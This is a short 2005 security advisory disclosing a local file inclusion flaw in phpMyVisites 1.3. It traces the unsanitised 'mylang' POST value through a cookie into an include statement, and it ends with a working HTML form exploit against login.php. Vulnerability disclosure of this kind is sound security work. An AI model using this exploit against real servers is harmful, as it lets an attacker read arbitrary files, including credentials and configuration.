[exploits] phpMyVisites 1.3 local file retrieval
==================================================================
File: phpMyVisites 1.3 local file retrieval
From: remote
Date: 26/04/2005
Credits: Max Cerny (max[at]czerny[dot]cz)
Vendor: http://www.phpmyvisites.net
Affected version: 1.3, > not tested
==================================================================
==================================================================
Description:
Remote user can retrieve local file on the webserver
phpMyVisites is running on. It's cause due to bad user data
validation code.
FILE: include/set_lang.php
line 94:
include "./langs/".$lang['default_lang'];
assuming, we have set $lang['default_lang'] on line 66:
$lang['default_lang'] = $_COOKIE[$nomcookielg];
it's good, look onto
line 40:
setcookie($nomcookielg,$_POST['mylang'],time()+3600*24*365*10);
Now, we are able to spoof the value of $_POST['mylang'] to any file,
we want to be retrieved.
==================================================================
==================================================================
Exploit:
<form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
Local file: <input type="text" name="mylang" value="" />
<input type="submit" value="Alexx says RELAX!">
</form>
==================================================================
==================================================================
Fix:
Contact the Vendor
==================================================================
Have a nice Day !
==================================================================